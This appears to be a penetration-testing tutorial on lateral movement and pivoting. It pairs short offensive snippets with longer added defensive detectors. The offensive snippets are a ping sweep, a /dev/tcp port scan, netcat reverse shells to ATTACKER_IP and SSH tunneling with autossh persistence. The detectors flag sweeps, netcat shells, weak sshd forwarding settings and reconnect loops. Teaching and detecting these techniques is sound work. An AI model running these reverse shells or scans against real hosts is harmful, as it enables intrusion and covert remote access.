Post-Exploitation Part 2: Pivoting
Root on one box means nothing if you can't move. Part 2 covers lateral movement — Living off the Land, SSH tunneling, SOCKS proxying, and maintaining access across segmented networks.
Understanding Pivoting
In Part 1, we covered privilege escalation. Now we shift to pivoting — moving laterally within a network after initial compromise. Pivoting enables access to internal hosts and services not directly exposed, often leading to systems containing more sensitive data. Each compromised system pushes us deeper.
Living Off the Land
LOTL relies on tools already installed on the system. Since these binaries are legitimate and used daily, their activity often passes intrusion detection unnoticed.
Network Discovery with Bash
# Ping sweep — discover live hosts
for i in {1..255}; do
    (ping -c 1 192.168.1.${i} | grep "bytes from" &)
done

# Port scan — find services (bash's built-in /dev/tcp pseudo-device, no nmap needed)
for i in {1..65535}; do
    (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo "$i open"
done
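From the blue-team side, both loops have a very recognisable shape on the wire: one source sending ICMP echo to many hosts in quick succession, and one source touching many distinct TCP ports on a single host, one connection attempt each. The following is an added example (not code from the original post) that runs those two heuristics over connection records. The record format is a constructed, simplified conntrack/NetFlow-style line, `<epoch> <proto> <src> <dst> <dport>`, and the sample data is constructed to mirror the two loops above plus some ordinary traffic that must not alert.

```python
"""Flow-based detection of the Bash ping sweep and /dev/tcp port scan shown
above. Added example, not code from the original post. The record format is a
constructed, simplified conntrack/NetFlow-style line:
"<epoch> <proto> <src> <dst> <dport>" with dport "-" for ICMP."""
from collections import Counter, defaultdict


def parse_flow(line):
    """Parse one constructed flow line into a dict."""
    ts, proto, src, dst, dport = line.split()
    return {"ts": int(ts), "proto": proto, "src": src, "dst": dst,
            "dport": None if dport == "-" else int(dport)}


def _max_distinct_in_window(events, window):
    """events: sorted (ts, key) pairs. Return the largest set of distinct keys
    seen within any span of `window` seconds (sliding two-pointer window)."""
    counts, best, left = Counter(), set(), 0
    for ts, key in events:
        counts[key] += 1
        while ts - events[left][0] > window:
            old = events[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        if len(counts) > len(best):
            best = set(counts)
    return best


def detect_ping_sweep(flows, min_hosts=10, window=60):
    """{src: sorted hosts} for sources that ICMP-probe >= min_hosts distinct
    hosts within `window` seconds: the shape of the ping for-loop above."""
    per_src = defaultdict(list)
    for f in flows:
        if f["proto"] == "icmp":
            per_src[f["src"]].append((f["ts"], f["dst"]))
    alerts = {}
    for src, events in per_src.items():
        hosts = _max_distinct_in_window(sorted(events), window)
        if len(hosts) >= min_hosts:
            alerts[src] = sorted(hosts)
    return alerts


def detect_port_scan(flows, min_ports=20, window=60):
    """{(src, dst): port_count} for pairs where one source touches >= min_ports
    distinct TCP ports on one host within `window` seconds. The /dev/tcp loop
    produces exactly this: sequential ports, one connection attempt each."""
    per_pair = defaultdict(list)
    for f in flows:
        if f["proto"] == "tcp":
            per_pair[(f["src"], f["dst"])].append((f["ts"], f["dport"]))
    alerts = {}
    for pair, events in per_pair.items():
        ports = _max_distinct_in_window(sorted(events), window)
        if len(ports) >= min_ports:
            alerts[pair] = len(ports)
    return alerts


def _build_sample():
    """Constructed sample: one host sweeps .1-.20 then probes 40 ports on .1;
    a second host shows ordinary traffic that must not alert."""
    t = 1_700_000_000
    lines = [f"{t + i} icmp 192.168.1.50 192.168.1.{i} -" for i in range(1, 21)]
    lines += [f"{t + 30 + p // 10} tcp 192.168.1.50 192.168.1.1 {p}" for p in range(1, 41)]
    lines += [f"{t + 5} tcp 192.168.1.77 192.168.1.1 443",
              f"{t + 6} tcp 192.168.1.77 192.168.1.2 22",
              f"{t + 7} icmp 192.168.1.77 192.168.1.1 -",
              f"{t + 40} tcp 192.168.1.77 192.168.1.1 80"]
    return lines


SAMPLE_FLOWS = _build_sample()


def run(lines=SAMPLE_FLOWS):
    """Run both detectors over a list of flow lines."""
    flows = [parse_flow(line) for line in lines]
    return {"ping_sweep": detect_ping_sweep(flows),
            "port_scan": detect_port_scan(flows)}


if __name__ == "__main__":
    for kind, hits in run().items():
        print(kind, hits)
```

The thresholds (10 hosts, 20 ports, 60 seconds) are starting points, not gospel: tune them against your own baseline, and remember that the /dev/tcp loop runs sequentially, so on a large port range it is slow but still bursty enough per minute to cross the line.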
LOLBins — Netcat
nc is frequently preinstalled and its traffic blends with normal activity; it is commonly used for reverse shells, listeners, and file transfers.
# Reverse shell (with -e)
nc -e /bin/sh ATTACKER_IP PORT

# Reverse shell (named pipe fallback, for nc builds without -e)
rm /tmp/f; mkfifo /tmp/f
cat /tmp/f | /bin/sh -i 2>&1 | nc ATTACKER_IP PORT >/tmp/f

# File transfer
# Victim:
nc -l -p 1234 > received_file
# Attacker:
nc TARGET_IP 1234 < payload_file
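"Blends with normal activity" is true on the network, but on the host each of the three nc patterns above leaves a distinctive process footprint: an nc with `-e`/`-c`, an nc sitting in a pipeline next to an interactive `sh -i` (the mkfifo fallback), or an ad-hoc nc listener. The following is an added example, not code from the original post, that applies those checks to a process listing. The input is a constructed snapshot shaped like `ps -eo pid,ppid,user,args`; the same logic applies to auditd or EDR exec events, and the 203.0.113.10 address is a constructed placeholder.

```python
"""Host-side detection of the netcat patterns above (nc -e, the mkfifo pipe
fallback and ad-hoc nc listeners) from a process listing. Added example, not
code from the original post. Input is a constructed snapshot shaped like
`ps -eo pid,ppid,user,args`; the same checks apply to auditd/EDR exec events."""
import shlex
from collections import defaultdict

NC_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELLS = {"sh", "bash", "dash", "zsh", "ash"}
# -e / -c execute a program in ncat and nc.traditional; verify on the
# specific nc build, since other variants reuse -c for different things.
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}


def parse_ps(line):
    """'PID PPID USER ARGS...' -> dict, ARGS kept as the raw command line."""
    pid, ppid, user, cmd = line.split(None, 3)
    return {"pid": int(pid), "ppid": int(ppid), "user": user, "cmd": cmd}


def _argv(proc):
    try:
        return shlex.split(proc["cmd"])
    except ValueError:  # unbalanced quotes in a hostile command line
        return proc["cmd"].split()


def _basename(argv):
    return argv[0].rsplit("/", 1)[-1] if argv else ""


def _is_interactive_shell(proc):
    argv = _argv(proc)
    return _basename(argv) in SHELLS and "-i" in argv[1:]


def _is_listener(opts):
    """-l, -lvp, -nlvp ... or --listen; long options are not option clusters."""
    return "--listen" in opts or any(
        o.startswith("-") and not o.startswith("--") and "l" in o[1:] for o in opts)


def find_suspicious(procs):
    """Return [(pid, reason)] for processes matching the netcat patterns."""
    by_ppid = defaultdict(list)
    for p in procs:
        by_ppid[p["ppid"]].append(p)
    findings = []
    for p in procs:
        argv = _argv(p)
        if _basename(argv) not in NC_NAMES:
            continue
        opts = argv[1:]
        if EXEC_FLAGS & set(opts):
            findings.append((p["pid"], "netcat spawning a program (-e/-c): bind or reverse shell"))
        elif _is_listener(opts):
            findings.append((p["pid"], "ad-hoc netcat listener"))
        # the named-pipe fallback runs cat, sh -i and nc as siblings in one pipeline
        if any(s is not p and _is_interactive_shell(s) for s in by_ppid[p["ppid"]]):
            findings.append((p["pid"], "netcat in a pipeline with an interactive shell (mkfifo fallback)"))
    return findings


# Constructed snapshot: three suspicious nc invocations under separate shells,
# plus a benign connectivity check (nc -zv) that must not alert.
SAMPLE_PS = """\
1 0 root /sbin/init
612 1 root /usr/sbin/sshd -D
2200 612 deploy bash
2310 2200 deploy nc -e /bin/sh 203.0.113.10 4444
2201 612 deploy bash
2320 2201 deploy cat /tmp/f
2321 2201 deploy /bin/sh -i
2322 2201 deploy nc 203.0.113.10 4444
2202 612 deploy bash
2330 2202 deploy nc -l -p 1234
2400 612 alice bash
2410 2400 alice nc -zv 192.168.1.1 443
"""


def run(text=SAMPLE_PS):
    """Parse a ps-style listing and return the findings."""
    return find_suspicious([parse_ps(line) for line in text.splitlines()])


if __name__ == "__main__":
    for pid, reason in run():
        print(pid, reason)
```

The sibling check is what catches the mkfifo variant, since that nc carries no suspicious flags at all; a one-off `nc -zv host port` connectivity test stays quiet, which is the point of checking argument shape and process neighbours rather than just the binary name.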
SSH Tunneling
SSH establishes encrypted connections between systems. By abusing SSH tunneling, we forward traffic through compromised hosts — staying encrypted and blending with normal SSH traffic while accessing internal services.
Local Port Forwarding
Exposes a remote service on a local port. Traffic from the local port is forwarded through the SSH tunnel to the destination.
# Forward remote port 80 to local 8080
ssh -L 8080:127.0.0.1:80 user@ssh_server
# 8080 = local listening port
# 127.0.0.1:80 = destination from SSH server's perspective
# localhost:8080 now reaches the remote service
Remote Port Forwarding
The inverse — expose a local service through a remote SSH server. The remote server listens on a specified port and tunnels connections back to your machine.
# Expose local 8080 via remote port 9000
ssh -R 9000:localhost:8080 user@10.10.10.5
# Port 9000 opens on 10.10.10.5
# Connections to 10.10.10.5:9000 → localhost:8080
Remote port forwarding is particularly useful for pivoting because it exposes internal services to your attack machine, creates reliable callback channels, and the traffic is encrypted — blending with normal SSH usage.
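Whether any of the -L / -R tricks above work at all is decided by a handful of sshd_config directives on the pivot host, which is also where a defender cuts them off. The following is an added example (not code from the original post, and not an OpenSSH tool) that audits the global section of an sshd_config for those directives and reports every one whose effective value, explicit or defaulted, still permits forwarding. Both config texts are constructed; the defaults and keyword names are the ones documented in sshd_config(5).

```python
"""Audit an sshd_config for the directives that decide whether the -L and -R
tunnels above work at all. Added example, not from the original post; the two
config texts are constructed, and the defaults are those documented in
sshd_config(5) for OpenSSH."""
import re

# keyword -> (values considered hardened, OpenSSH default, why it matters)
FORWARDING_RULES = {
    "AllowTcpForwarding": ({"no"}, "yes",
        "default 'yes' lets every user run -L/-R/-D forwards through this host"),
    "GatewayPorts": ({"no"}, "no",
        "'yes' or 'clientspecified' lets -R listeners bind on all interfaces, "
        "so a forwarded service becomes reachable from the whole network"),
    "PermitTunnel": ({"no"}, "no",
        "'yes' allows layer-2/3 tun-device tunnels (ssh -w)"),
    "AllowStreamLocalForwarding": ({"no"}, "yes",
        "Unix-socket forwarding is a second path to the same effect"),
}

# sshd accepts "Keyword value" or "Keyword=value"
_SPLIT = re.compile(r"\s*=\s*|\s+")


def parse_sshd_config(text):
    """Return {keyword_lower: value} for the global section only. sshd keeps
    the first value it sees for a keyword, so earlier lines win. Match blocks
    override per user/host and are deliberately not parsed here; review them
    separately."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = _SPLIT.split(line, maxsplit=1)
        key = parts[0].lower()
        value = parts[1].strip() if len(parts) > 1 else ""
        if key == "match":
            break
        conf.setdefault(key, value)
    return conf


def audit_forwarding(conf):
    """Return [(keyword, effective_value, reason)] for every forwarding-related
    directive whose effective value (set or defaulted) is not the hardened one."""
    findings = []
    for key, (hardened, default, why) in FORWARDING_RULES.items():
        effective = conf.get(key.lower(), default).lower()
        if effective not in hardened:
            findings.append((key, effective, why))
    return findings


# Constructed: a jump host that never set the forwarding directives and
# opened GatewayPorts to make a -R listener reachable from other hosts.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
GatewayPorts yes
"""

# Constructed: forwarding disabled globally; re-enable for specific accounts
# with a Match block (plus PermitOpen/PermitListen) if a service really needs it.
HARDENED_SSHD_CONFIG = """\
Port 22
PermitRootLogin no
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
AllowStreamLocalForwarding no
"""


def audit_text(text):
    """Convenience wrapper: parse then audit."""
    return audit_forwarding(parse_sshd_config(text))


if __name__ == "__main__":
    for name, text in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit_text(text) or "no findings")
```

Two practical consequences for the -R example above: with the OpenSSH default `GatewayPorts no`, the port-9000 listener binds to the SSH server's loopback only, so other hosts on 10.10.10.0/24 cannot reach it unless the server has been opened up; and with `AllowTcpForwarding no` the session still authenticates but every -L and -R request is refused, which is why the audit treats an absent `AllowTcpForwarding` line as a finding rather than as safe.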
Persistence with autossh
Standard SSH tunnels drop when the connection dies. autossh monitors and re-establishes tunnels automatically — providing reliable persistence even in restricted network environments.
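The price of that persistence is a log trail: every time autossh re-establishes the tunnel, sshd on the pivot host writes another "Accepted ... for user from source" line, and a reconnect loop produces them at near-regular intervals from one user and one source. The following is an added example, not code from the original post, that pulls successful logins out of sshd auth log lines and flags (user, source) pairs that re-authenticate repeatedly and regularly. The log lines are constructed in the traditional syslog format sshd writes (`Mon DD HH:MM:SS host sshd[pid]: Accepted method for user from addr port N ssh2`); journald or ISO-timestamp setups need a different timestamp pattern.

```python
"""Spot the tunnel-keepalive pattern of autossh (or any reconnect loop) in
sshd auth logs: the same user from the same source re-authenticating many
times at near-regular intervals. Added example, not from the original post;
the log lines are constructed in standard sshd syslog format."""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted (?P<method>\S+) for (?P<user>\S+) from (?P<src>\S+) port \d+"
)


def parse_accepts(lines, year=2024):
    """Return [(timestamp, user, src)] for each successful-login line.
    Syslog timestamps carry no year, so one is supplied by the caller."""
    out = []
    for line in lines:
        m = ACCEPT_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        out.append((ts, m["user"], m["src"]))
    return out


def find_reconnect_loops(events, min_sessions=5, window_s=3600, max_jitter=0.25):
    """{(user, src): (sessions, mean_gap_s)} for pairs with >= min_sessions
    logins whose whole run fits in window_s seconds and whose gaps are regular
    (population stdev <= max_jitter * mean gap). Humans are not that regular;
    keepalive loops and cron jobs are."""
    per_pair = defaultdict(list)
    for ts, user, src in events:
        per_pair[(user, src)].append(ts)
    loops = {}
    for pair, stamps in per_pair.items():
        stamps.sort()
        if len(stamps) < min_sessions:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        span = (stamps[-1] - stamps[0]).total_seconds()
        if gaps and span <= window_s and pstdev(gaps) <= max_jitter * mean(gaps):
            loops[pair] = (len(stamps), round(mean(gaps)))
    return loops


# Constructed sample: "deploy" reconnects from 10.10.10.20 every ~10 minutes
# (a reconnect loop), while "alice" logs in twice at irregular times.
SAMPLE_AUTH_LOG = """\
Nov 20 08:00:01 jump sshd[1501]: Accepted publickey for deploy from 10.10.10.20 port 50122 ssh2: ED25519 SHA256:constructed
Nov 20 08:03:14 jump sshd[1533]: Accepted password for alice from 10.10.10.30 port 50201 ssh2
Nov 20 08:10:02 jump sshd[1590]: Accepted publickey for deploy from 10.10.10.20 port 50140 ssh2: ED25519 SHA256:constructed
Nov 20 08:20:01 jump sshd[1644]: Accepted publickey for deploy from 10.10.10.20 port 50162 ssh2: ED25519 SHA256:constructed
Nov 20 08:30:03 jump sshd[1702]: Accepted publickey for deploy from 10.10.10.20 port 50180 ssh2: ED25519 SHA256:constructed
Nov 20 08:31:55 jump sshd[1710]: Failed password for invalid user admin from 10.10.10.99 port 41000 ssh2
Nov 20 08:40:02 jump sshd[1751]: Accepted publickey for deploy from 10.10.10.20 port 50199 ssh2: ED25519 SHA256:constructed
Nov 20 08:50:01 jump sshd[1803]: Accepted publickey for deploy from 10.10.10.20 port 50215 ssh2: ED25519 SHA256:constructed
Nov 20 09:45:10 jump sshd[1990]: Accepted password for alice from 10.10.10.30 port 50300 ssh2
"""


def run(text=SAMPLE_AUTH_LOG):
    """Parse the log text and return the detected reconnect loops."""
    return find_reconnect_loops(parse_accepts(text.splitlines()))


if __name__ == "__main__":
    for (user, src), (n, gap) in run().items():
        print(f"{user}@{src}: {n} logins, every ~{gap}s")
```

A legitimate scheduled job will trip this too, which is fine: the alert is "something re-authenticates like a machine from this address", and the response is to check whether that account and source are supposed to hold a standing tunnel. Pair it with the sshd_config audit: an account that does not need `AllowTcpForwarding` cannot keep a tunnel up no matter how often it reconnects.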
Each technique serves a different scenario: LOTL for stealth recon, SSH tunneling for encrypted access to internal services, SOCKS proxying for routing arbitrary traffic. Layer them for maximum reach.